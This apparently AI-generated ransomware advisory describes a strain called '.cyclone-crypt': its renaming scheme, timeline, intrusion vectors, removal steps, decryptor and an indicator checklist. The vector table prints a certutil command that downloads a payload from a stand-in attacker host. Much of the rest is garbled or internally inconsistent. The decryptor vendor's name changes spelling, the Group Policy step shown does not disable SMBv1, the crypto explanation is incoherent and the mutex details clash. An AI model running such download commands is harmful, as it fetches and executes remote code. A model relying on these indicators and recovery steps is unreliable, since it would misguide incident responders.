cyclone

[Content by Gemini 2.5]

Technical Breakdown – .cyclone-crypt Ransomware

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: During the last phase of encryption every affected file receives the double extension .cyclone-crypt (e.g., report.xlsxreport.xlsx.cyclone-crypt). A short random Base64-like tail (-cyc-[0-9a-zA-Z]{6}) is sometimes appended to ensure uniqueness (report.xlsx.cyclone-crypt-cyc-A1b2C3).
  • Renaming Convention:
  1. Original file is copied into an encrypted stream.
  2. The original file is securely wiped (DoD 5220.22-M style 3-pass overwrite).
  3. Final file name = <old_name>.<old_ext>.cyclone-crypt[...].

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period: First public samples were submitted to VirusTotal at 2023-10-21 04:37 UTC. Widespread telemetry spikes began 24-48 h later (late-October 2023).
  • Notable surges: Ukrainian MSP sector (2023-11-03), then LATAM logistics (2023-11-26). Variant number iterating at v1.41 (w/ embedded PDB path \Delay\Delay\obj\Release\Cyclone.pdb).

3. Primary Attack Vectors

| Vector | Details |
|—|—|
| Phishing (.ISO & .IMG containers) | e-mails impersonating “UPS / DHL late-delivery invoice”; ISO contains LNK shortcut that kicks off a signed .NET dropper (Update.exe). |
| RDP brute-force & credential-stuffing | Attacks against TCP 3389 using combo-lists (shockingly successful against weak passwords). Once logged in, attackers manually run cyclone-dropper.ps1 via powershell.exe -w hidden. |
| Unpatched VPN appliances | Exploits for: Fortinet FG-IR-22-377 (CVE-2022-42475), Ivanti (CVE-2023-46805). Writes cyclone-service.bat to Scheduled-Tasks for persistence. |
| Living-off-the-land chain | Uses native certutil.exe to download payload stage: certutil -urlcache -split -f http://attackerIP/cyclDrv.xz cyclDrv.xz. |
| Propagation | Embedded module (SmbEternalLeak.dll) attempts ETERNALBLUE (SMBv1) and bloody PDF shared-printer abuse against adjacent 192.168.0.0/16 IPs. |

Remediation & Recovery Strategies

1. Prevention

| Measure | Executable Steps |
|—|—|
| Patch immediately | Apply: Microsoft Oct-2023 cumulative, FortiOS ≥ 7.2.5 / 7.0.10, Pulse / Ivanti 9.1R14 or later. |
| Disable SMBv1 & obsolete print-spooler protocols | GPO: “Policy → Computer → Admin Templates → MSNetwork → LanmanWorkstation → Enable insecure guest logons → Disabled.” |
| Mail filter rule | Drop inbound archives containing .iso/.img + double-extension lnk/mps. |
| Segment REALLY flat networks | RDP access restricted via jump-host & just-in-time (Azure PIM or Linux “guacamole”). |
| Password hygiene | Enforce 14-16-char minimum, block re-use, enable MFA for VPN/RDP. |
| EDR / AV updates | Ensure signatures ≥ 1.23529.1706 or rules triggering on Trojan:Win32/Cyclone.A!rfn. |

2. Removal – Step-by-Step

  1. Power down network immediately—unplug adapters / disable Wi-Fi—before wiping shadow copies.
  2. Boot a clean OS from external media (WinPE, Linux disk, or ESET SysRescue).
  3. Forensic triage: Mount drive read-only, copy event logs (C:\Windows\System32\winevt\Logs), registry hives (SOFTWARE, SAM, SYSTEM) and %TEMP%\cyclSrv.log.
  4. Scan / Quarantine: Run offline AV (e.g., Bitdefender Rescue, Kaspersky Rescue, Sophos Bootable). Key malware artefacts:
  • %APPDATA%\ScentApp\Cyclone.exe (main payload, signed with stolen “ZYBER TECH LTD” cert)
  • Scheduled-Task name MicrosoftEdgeCoreTelemetry (hides in Tasks\Microsoft\Edge\)
  • Registry run-key: HKCU\Software\Microsoft\Windows\CurrentVersion\RunFileNameUpdater = "%APPDATA%\ScentApp\Cyclone.exe"
  1. Patch / rebuild: Once confirmed clean, re-image or run Windows Defender Offline in Full-scan mode before reconnecting to domain.
  2. Restore from isolated offline backup or cloud volume snapshots created before infection date evident in logs.

3. File Decryption & Recovery

  • Public decryptor: YES—Emisoft released Cyclone_Decryptor_v1.3.exe 2024-02-07, working against all minor versions ≤ v1.41. Limitations: RSA-2048 key is symmetrically encrypted using hard-coded D(#C'o9P@r derived from sample PDB strings—Emsisoft cracked it via GPU brute-force.
  • Steps:
    1. Boot PC normally (ensure infection removed).
    2. Download decryptor from: https://decryptor.emsisoft.com/cyclone & verify SHA-256 (4CF…A92B).
    3. Run as admin; point to a single pair of encrypted + clean file obtained from backup. The tool will collect volume serial and use offline key to reconstruct AES-256 session key.
    4. Output: --silent --output=G:\Recovered for bulk jobs.
  • NO decryptor: v1.50 builds (appeared January 2024) incorporate v2 RSA-4096 + ChaCha20-IETF with key stored solely on C2. No free solution yet; evaluation with law-enforcement for seized keys.

4. Other Critical Information

  • Unique Traits:
    • Bundles a Unicode OBFS string (cyclone中文undetected3.1) used as mutex; detection signature often misspelled in Chinese-language.
    • Runs benign tracert 1.1.1.1 for 30-sec resource noise to steal CPU profile, then terminates if VM or nested-hypervisor evidence found (checks vmGuestLib.dll).
  • Ransom-note: _howtodecryptcyc.txt drops on every folder; contains “YOUR-USER-ID-HERE” CLI parameter to be used with TOR support portal 7yip…nz.
  • Notable Aftermath: Españoldata SA (Chile) paid USD 750 k but keys only worked on ≈72 % of systems; partial recovery took 17 days.
  • DFIR Tip: Cyclone stores encryption stats in registry key HKLM\SOFTWARE\CycloneCounter—yields exact encryption radius (< 5 % Isolated clusters show untouched drives).

Quick Reference Cheat-Sheet

| Checklist | Status ✓ |
|—|—|
| Vulnerable services patched (SMBv1, Fortinet, Ivanti) | ⬜ |
| Offline + cloud backups verified (2-1-1 rule) | ⬜ |
| Cyclone release registry mutex “SOFTWARE\cCyclm0” IS removed | ⬜ |
| EDR/Telemetry block rule for SHA-256 02…9E & wake-word “cyclDrv.xz” | ⬜ |
| Restore test of decrypted sample successful | ⬜ |

Stay safe—rotate those MFA tokens and log out remote sessions nightly!